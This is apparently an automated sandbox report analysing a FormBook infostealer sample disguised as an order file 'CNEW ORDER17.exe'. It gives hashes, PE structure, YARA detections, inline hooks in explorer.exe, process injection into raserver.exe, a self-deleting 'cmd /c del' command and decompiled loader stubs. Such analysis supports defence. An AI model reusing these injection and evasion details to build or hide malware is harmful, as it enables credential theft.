          • Excluded IPs from analysis (whitelisted): 20.49.157.6, 209.197.3.8, 93.184.221.240, 20.199.120.182, 20.54.110.249, 40.112.88.60, 52.251.79.25, 20.199.120.151, 2.20.178.33, 2.20.178.24, 20.199.120.85
          • Excluded domains from analysis (whitelisted): consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, hlb.apr-52dd2-0.edgecastdns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, client.wns.windows.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, wu.ec.azureedge.net, wu-shim.trafficmanager.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, cds.d2s7q6s2.hwcdn.net, ris.api.iris.microsoft.com, iris-de-ppe-azsc-uks.uksouth.cloudapp.azure.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
          • Not all processes where analyzed, report is missing behavior information
          • VT rate limit hit for: /opt/package/joesandbox/database/analysis/502245/sample/CNEW ORDER17.exe

          Simulations

          Behavior and APIs

          No simulations

          Joe Sandbox View / Context

          IPs

          No context

          Domains

          No context

          ASN

          No context

          JA3 Fingerprints

          No context

          Dropped Files

          No context

          Created / dropped Files

          C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CNEW ORDER17.exe.log
          Process:C:\Users\user\Desktop\CNEW ORDER17.exe
          File Type:ASCII text, with CRLF line terminators
          Category:modified
          Size (bytes):425
          Entropy (8bit):5.340009400190196
          Encrypted:false
          SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhav:ML9E4Ks2wKDE4KhK3VZ9pKhk
          MD5:CC144808DBAF00E03294347EADC8E779
          SHA1:A3434FC71BA82B7512C813840427C687ADDB5AEA
          SHA-256:3FC7B9771439E777A8F8B8579DD499F3EB90859AD30EFD8A765F341403FC7101
          SHA-512:A4F9EB98200BCAF388F89AABAF7EA57661473687265597B13192C24F06638C6339A3BD581DF4E002F26EE1BA09410F6A2BBDB4DA0CD40B59D63A09BAA1AADD3D
          Malicious:true
          Reputation:moderate, very likely benign file
          Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..
          C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe
          Process:C:\Users\user\Desktop\CNEW ORDER17.exe
          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
          Category:dropped
          Size (bytes):983040
          Entropy (8bit):7.643700581671609
          Encrypted:false
          SSDEEP:12288:lxGAAVPJ9rY0Vjf23ZgTJt8mwSwtpaYKXrEUpDK30dBlVhxYuWyrZFvn6+OhO:eAGNYoOiT/8mN+aYW4OHboirZFv6/
          MD5:C54EDC9EF9D72FE0FE048E8AC884626B
          SHA1:11DCE70F33E490EB9B89726776915A374BB59A59
          SHA-256:43FCB442B80665D42271689310EBD569E84F74287063A62E14BEBA808178E098
          SHA-512:C65D37DE77AD4598EE0B665145C988681D38FC26AA2EB2F5B5D1B73646EAA843CB18C4172D0ED7DCEE4BD25BDF692E7B1AACC410A56B6959158F9E3BAB1F0C81
          Malicious:true
          Antivirus:
          • Antivirus: Avira, Detection: 100%
          • Antivirus: Joe Sandbox ML, Detection: 100%
          Reputation:low
          Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Y,...............0..l..........j.... ........@.. .......................`............@.....................................O............................@....................................................... ............... ..H............text...pj... ...l.................. ..`.rsrc................n..............@..@.reloc.......@......................@..B................L.......H.......(#...............3...V..........................................~r...p(......-.(....*r...p(....*.0..H.......s......o....+..o.......(....(......(.....o.......(....#......3@2..o....*.0..M.......(....(....o.......+2.....o....,"..( ...,..o!...r...p("...,..(....&..X....i2.*....0..4.......ri..p(#...r...p ............%.(....(.....o$...t....*.0.."........r...p .......o$....$......&...*.*...................(....*..0.......... .....%..... .....%.......i.&.....(%...r...po&......
          C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe:Zone.Identifier
          Process:C:\Users\user\Desktop\CNEW ORDER17.exe
          File Type:ASCII text, with CRLF line terminators
          Category:dropped
          Size (bytes):26
          Entropy (8bit):3.95006375643621
          Encrypted:false
          SSDEEP:3:ggPYV:rPYV
          MD5:187F488E27DB4AF347237FE461A079AD
          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
          Malicious:true
          Reputation:high, very likely benign file
          Preview: [ZoneTransfer]....ZoneId=0

          Static File Info

          General

          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
          Entropy (8bit):7.643700581671609
          TrID:
          • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
          • Win32 Executable (generic) a (10002005/4) 49.78%
          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
          • Generic Win/DOS Executable (2004/3) 0.01%
          • DOS Executable Generic (2002/1) 0.01%
          File name:CNEW ORDER17.exe
          File size:983040
          MD5:c54edc9ef9d72fe0fe048e8ac884626b
          SHA1:11dce70f33e490eb9b89726776915a374bb59a59
          SHA256:43fcb442b80665d42271689310ebd569e84f74287063a62e14beba808178e098
          SHA512:c65d37de77ad4598ee0b665145c988681d38fc26aa2eb2f5b5d1b73646eaa843cb18c4172d0ed7dcee4bd25bdf692e7b1aacc410a56b6959158f9e3bab1f0c81
          SSDEEP:12288:lxGAAVPJ9rY0Vjf23ZgTJt8mwSwtpaYKXrEUpDK30dBlVhxYuWyrZFvn6+OhO:eAGNYoOiT/8mN+aYW4OHboirZFv6/
          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....Y,...............0..l..........j.... ........@.. .......................`............@................................

          File Icon

          Icon Hash:07d8d8d4d4d85026

          Static PE Info

          General

          Entrypoint:0x4c8a6a
          Entrypoint Section:.text
          Digitally signed:false
          Imagebase:0x400000
          Subsystem:windows gui
          Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
          DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Time Stamp:0xE32C5996 [Tue Oct 10 16:02:30 2090 UTC]
          TLS Callbacks:
          CLR (.Net) Version:v4.0.30319
          OS Version Major:4
          OS Version Minor:0
          File Version Major:4
          File Version Minor:0
          Subsystem Version Major:4
          Subsystem Version Minor:0
          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

          Entrypoint Preview

          Instruction
          jmp dword ptr [00402000h]
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al
          add byte ptr [eax], al

          Data Directories

          NameVirtual AddressVirtual Size Is in Section
          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IMPORT0xc8a180x4f.text
          IMAGE_DIRECTORY_ENTRY_RESOURCE0xca0000x28f18.rsrc
          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0xf40000xc.reloc
          IMAGE_DIRECTORY_ENTRY_DEBUG0xc89fc0x1c.text
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

          Sections

          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x20000xc6a700xc6c00False0.997636595912data7.99906118019IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          .rsrc0xca0000x28f180x29000False0.0645364900915data3.05282770232IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          .reloc0xf40000xc0x200False0.044921875data0.0980041756627IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

          Resources

          NameRVASizeTypeLanguageCountry
          RT_ICON0xca3c00x2e8dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 1650615026, next used block 1650614882
          RT_ICON0xca6b80x128GLS_BINARY_LSB_FIRST
          RT_ICON0xca7f00x2ca8dBase IV DBT of \300.DBF, block length 9216, next free block index 40, next free block 16843009, next used block 16843009
          RT_ICON0xcd4a80x1bc8data
          RT_ICON0xcf0800x1628dBase IV DBT of \200.DBF, blocks size 0, block length 4096, next free block index 40, next free block 4294967295, next used block 4294967295
          RT_ICON0xd06b80x1418data
          RT_ICON0xd1ae00xea8data
          RT_ICON0xd29980xba8data
          RT_ICON0xd35500x8a8dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0
          RT_ICON0xd3e080x6c8data
          RT_ICON0xd44e00x608data
          RT_ICON0xd4af80x568GLS_BINARY_LSB_FIRST
          RT_ICON0xd50700xc33PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
          RT_ICON0xd5cb40x94a8data
          RT_ICON0xdf16c0x5488data
          RT_ICON0xe46040x4228dBase IV DBT of \200.DBF, blocks size 0, block length 16896, next free block index 40, next free block 0, next used block 0
          RT_ICON0xe883c0x3a48data
          RT_ICON0xec2940x25a8data
          RT_ICON0xee84c0x1a68data
          RT_ICON0xf02c40x10a8data
          RT_ICON0xf137c0x988data
          RT_ICON0xf1d140x6b8data
          RT_ICON0xf23dc0x468GLS_BINARY_LSB_FIRST
          RT_GROUP_ICON0xf28540x148data
          RT_VERSION0xf29ac0x36cdata
          RT_MANIFEST0xf2d280x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

          Imports

          DLLImport
          mscoree.dll_CorExeMain

          Version Infos

          DescriptionData
          Translation0x0000 0x04b0
          LegalCopyrightCopyright 2021
          Assembly Version1.0.0.0
          InternalNameConsoleApp17.exe
          FileVersion1.0.0.0
          CompanyName
          LegalTrademarks
          CommentsWindowsFormsApp7
          ProductNameWindowsFormsApp7
          ProductVersion1.0.0.0
          FileDescriptionWindowsFormsApp7
          OriginalFilenameConsoleApp17.exe

          Network Behavior

          No network behavior found

          Code Manipulations

          User Modules

          Hook Summary

          Function NameHook TypeActive in Processes
          PeekMessageAINLINEexplorer.exe
          PeekMessageWINLINEexplorer.exe
          GetMessageWINLINEexplorer.exe
          GetMessageAINLINEexplorer.exe

          Processes

          Process: explorer.exe, Module: user32.dll
          Function NameHook TypeNew Data
          PeekMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xEA
          PeekMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xEA
          GetMessageWINLINE0x48 0x8B 0xB8 0x81 0x1E 0xEA
          GetMessageAINLINE0x48 0x8B 0xB8 0x89 0x9E 0xEA

          Statistics

          CPU Usage

          Click to jump to process

          Memory Usage

          Click to jump to process

          High Level Behavior Distribution

          Click to dive into process behavior distribution

          Behavior

          Click to jump to process

          System Behavior

          Analysis Process: CNEW ORDER17.exe PID: 4344 Parent PID: 3088

          General

          Start time:18:35:34
          Start date:13/10/2021
          Path:C:\Users\user\Desktop\CNEW ORDER17.exe
          Wow64 process (32bit):true
          Commandline:'C:\Users\user\Desktop\CNEW ORDER17.exe'
          Imagebase:0x1a0000
          File size:983040 bytes
          MD5 hash:C54EDC9EF9D72FE0FE048E8AC884626B
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:.Net C# or VB.NET
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.424773076.0000000003719000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.424773076.0000000003719000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.424773076.0000000003719000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.424873904.00000000037B2000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.424873904.00000000037B2000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.424873904.00000000037B2000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation:low

          Chronological Activities

          Analysis Process: CNEW ORDER17.exe PID: 5680 Parent PID: 4344

          General

          Start time:18:36:33
          Start date:13/10/2021
          Path:C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe
          Imagebase:0x4d0000
          File size:983040 bytes
          MD5 hash:C54EDC9EF9D72FE0FE048E8AC884626B
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.519487969.0000000000B30000.00000040.00020000.sdmp, Author: Joe Security
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.519487969.0000000000B30000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.519487969.0000000000B30000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000F.00000002.519680465.0000000000F70000.00000040.00020000.sdmp, Author: Joe Security
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000F.00000002.519680465.0000000000F70000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000F.00000002.519680465.0000000000F70000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
          Antivirus matches:
          • Detection: 100%, Avira
          • Detection: 100%, Joe Sandbox ML
          Reputation:low

          Chronological Activities

          Analysis Process: explorer.exe PID: 3352 Parent PID: 5680

          General

          Start time:18:36:35
          Start date:13/10/2021
          Path:C:\Windows\explorer.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\Explorer.EXE
          Imagebase:0x7ff720ea0000
          File size:3933184 bytes
          MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000000.455090898.00000000079B2000.00000040.00020000.sdmp, Author: Joe Security
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000000.455090898.00000000079B2000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000000.455090898.00000000079B2000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000010.00000000.472604115.00000000079B2000.00000040.00020000.sdmp, Author: Joe Security
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000010.00000000.472604115.00000000079B2000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000010.00000000.472604115.00000000079B2000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation:high

          Chronological Activities

          Analysis Process: raserver.exe PID: 4632 Parent PID: 5680

          General

          Start time:18:37:16
          Start date:13/10/2021
          Path:C:\Windows\SysWOW64\raserver.exe
          Wow64 process (32bit):true
          Commandline:C:\Windows\SysWOW64\raserver.exe
          Imagebase:0xc0000
          File size:108544 bytes
          MD5 hash:2AADF65E395BFBD0D9B71D7279C8B5EC
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.569532126.0000000000350000.00000004.00000001.sdmp, Author: Joe Security
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.569532126.0000000000350000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.569532126.0000000000350000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.570686773.0000000002B40000.00000040.00020000.sdmp, Author: Joe Security
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.570686773.0000000002B40000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.570686773.0000000002B40000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Author: Joe Security
          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000012.00000002.570839920.0000000002E40000.00000040.00020000.sdmp, Author: JPCERT/CC Incident Response Group
          Reputation:moderate

          Chronological Activities

          Analysis Process: cmd.exe PID: 4476 Parent PID: 4632

          General

          Start time:18:37:20
          Start date:13/10/2021
          Path:C:\Windows\SysWOW64\cmd.exe
          Wow64 process (32bit):true
          Commandline:/c del 'C:\Users\user\AppData\Local\Temp\CNEW ORDER17.exe'
          Imagebase:0xd80000
          File size:232960 bytes
          MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Chronological Activities

          Analysis Process: conhost.exe PID: 6628 Parent PID: 4476

          General

          Start time:18:37:20
          Start date:13/10/2021
          Path:C:\Windows\System32\conhost.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Imagebase:0x7ff7f20f0000
          File size:625664 bytes
          MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Reputation:high

          Chronological Activities

          Disassembly

          Code Analysis

          Reset < >

            Analysis Process: CNEW ORDER17.exe PID: 4344 Parent PID: 3088 CNEW ORDER17.exeCOMMON

            Executed Functions

            Function 0078D01C, Relevance: .1, Instructions: 70COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.423868362.000000000078D000.00000040.00000001.sdmp, Offset: 0078D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: f5226496fb8039a40c04a66409e364734cff0d7518203abe912e00fdd98d3d65
            • Instruction ID: 4083c432379ef441f195b809c31b7a6ac52114b5611c29119f5990a6212ed2bd
            • Opcode Fuzzy Hash: f5226496fb8039a40c04a66409e364734cff0d7518203abe912e00fdd98d3d65
            • Instruction Fuzzy Hash: 7121F6715842449FDB20EF14D5C4B66BB69FBC4314F20C669D8455B281C33ADC07C761
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0078D017, Relevance: .1, Instructions: 51COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 00000000.00000002.423868362.000000000078D000.00000040.00000001.sdmp, Offset: 0078D000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 1d356e738c77c740cf6e7af0c5f3bf2e23ccfe7435aa47788a5be62dc3261056
            • Instruction ID: 8e7787e7d387a077606b470be9ed8411b4a42413df379eafc10d459f26592b78
            • Opcode Fuzzy Hash: 1d356e738c77c740cf6e7af0c5f3bf2e23ccfe7435aa47788a5be62dc3261056
            • Instruction Fuzzy Hash: 8D110671544284CFDB21DF14D5C4B16FB71FB84324F24C6AAC8494B686C33AD80BCB92
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Analysis Process: CNEW ORDER17.exe PID: 5680 Parent PID: 4344 CNEW ORDER17.exeCOMMON

            Executed Functions

            Function 00419FDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38filenativeCOMMON
            Download Yara Rule
            APIs
            • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 0041A025
            Strings
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: FileRead
            • String ID: BMA$BMA
            • API String ID: 2738559852-2163208940
            • Opcode ID: 0198830ce0ec1a67cca983e6ebc44af9f2406b80b95dcfc6c2cdc26251ef57a6
            • Instruction ID: b282d4db4860f9f1fa6b8ea4a55207acd3d7ccaaa3858a6f1ef1e11ccf14a342
            • Opcode Fuzzy Hash: 0198830ce0ec1a67cca983e6ebc44af9f2406b80b95dcfc6c2cdc26251ef57a6
            • Instruction Fuzzy Hash: 05F0F4B2210208ABCB14DF99DC81EEB7BADAF8C354F158248BA0D97241C670E811CBE0
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00419FE0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
            Download Yara Rule
            C-Code - Quality: 37%
            			E00419FE0(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AB30(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






            0x00419fe3
            0x00419fef
            0x00419ff7
            0x0041a002
            0x0041a01d
            0x0041a025
            0x0041a029

            APIs
            • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 0041A025
            Strings
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: FileRead
            • String ID: BMA$BMA
            • API String ID: 2738559852-2163208940
            • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
            • Instruction ID: 370e936de0c6b30a0e9c68c176e8d16dab5dfb862c4be705976860dd555c5517
            • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
            • Instruction Fuzzy Hash: DCF0A4B2210208ABCB14DF89DC91EEB77ADAF8C754F158249BA1D97241D630E8518BA4
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C820( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CC40(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CEC0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B070(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













            0x0040acec
            0x0040acef
            0x0040acf4
            0x0040acf9
            0x0040ad03
            0x0040ad08
            0x0040ad0b
            0x0040ad0d
            0x0040ad15
            0x0040ad1a
            0x0040ad1a
            0x0040ad21
            0x0040ad29
            0x0040ad2c
            0x0040ad2e
            0x0040ad42
            0x00000000
            0x0040ad44
            0x0040ad4a
            0x0040acfe
            0x0040acfe
            0x0040acfe

            APIs
            • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
            Memory Dump Source
            • Source File: 0000000F.00000002.518976654.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: Load
            • String ID:
            • API String ID: 2234796835-0
